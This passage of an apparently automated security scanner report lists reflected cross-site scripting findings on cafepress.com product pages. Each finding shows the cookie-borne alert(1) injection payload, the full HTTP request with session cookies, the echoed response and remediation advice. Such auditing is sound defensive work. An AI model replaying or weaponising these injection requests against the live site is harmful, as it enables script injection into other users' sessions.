window.cafepress.tealeaf.searchTerm = 'b770e</script><script>alert(1)</script>35f226fbd0'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-bodysuits

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd70c"-alert(1)-"1bb61056447 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 59198
Date: Sun, 26 Dec 2010 13:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.13. http://www.cafepress.com/+baby-bodysuits [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-bodysuits

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d208f</script><script>alert(1)</script>60e92653a56 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d208f</script><script>alert(1)</script>60e92653a56; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59220
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'd208f</script><script>alert(1)</script>60e92653a56'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.14. http://www.cafepress.com/+baby-hat [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-hat

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50827"-alert(1)-"00860494a78 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 58548
Date: Sun, 26 Dec 2010 13:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:22 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA50827"-alert(1)-"00860494a78";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.15. http://www.cafepress.com/+baby-hat [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-hat

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93433</script><script>alert(1)</script>a643f06e2bf was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=93433</script><script>alert(1)</script>a643f06e2bf; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 58578
Date: Sun, 26 Dec 2010 13:47:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:20 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '93433</script><script>alert(1)</script>a643f06e2bf'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_0
...[SNIP]...

1.16. http://www.cafepress.com/+bags [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+bags

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab65"-alert(1)-"48e2c7462b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59555
Date: Sun, 26 Dec 2010 13:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:18 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.17. http://www.cafepress.com/+bags [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+bags

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e0a</script><script>alert(1)</script>2ef0362a154 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
